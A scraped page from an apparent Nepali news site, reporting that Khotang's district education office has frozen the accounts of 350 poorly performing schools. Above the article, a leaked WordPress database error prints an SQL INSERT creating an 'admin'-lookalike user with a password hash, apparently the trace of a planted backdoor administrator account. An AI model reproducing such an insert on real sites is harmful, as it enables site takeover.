WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BqWTPGk81wfzRXqsBkHuzkG52VgzJi1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 16:57:14', '', 'admlnlx', 'admlnlx')
खोटाङ, माघ २५ –
जिल्ला शिक्षा कार्यालय खोटाङले व्यवस्थापन र कार्य सम्पादनमा कमजोर भएका ३५० विद्यालयको खाता रोक्का गरेको छ ।
विभिन्न योजना जिम्मा लिएर समयमा पूरा नगर्ने, बेरुजु फस्र्यौट नगर्ने, सामाजिक लेखा परीक्षण नगराउने, व्यवस्थापन समिति गठनमा बेवास्ता गर्ने विद्यालयको खाता रोक्का गरेको हो ।
जिल्लाका प्रावि, निमावि र मावि गरी ४ सय ९० विद्यालय मध्ये १ एक ४० विद्यालयको मात्र कार्य सम्पादन चुस्तदुरुस्त पाइएको शिक्षाले जनाएको छ । खाता रोक्का हुँदा शिक्षक तलब लिनबाट वञ्चित भएका छन् ।
शैक्षिक ऐननियम अनुसार विद्यालय सञ्चालनका लागि दबाब सिर्जना गर्न खाता रोक्का गरिएको जिल्ला शिक्षा अधिकारी ज्ञानमणि नेपालले बताउनुभयो । मापदण्ड पूरा गर्दै आउने विद्यालयको क्रमशः खाता फुकुवा गरिने शिक्षाले जनाएको छ ।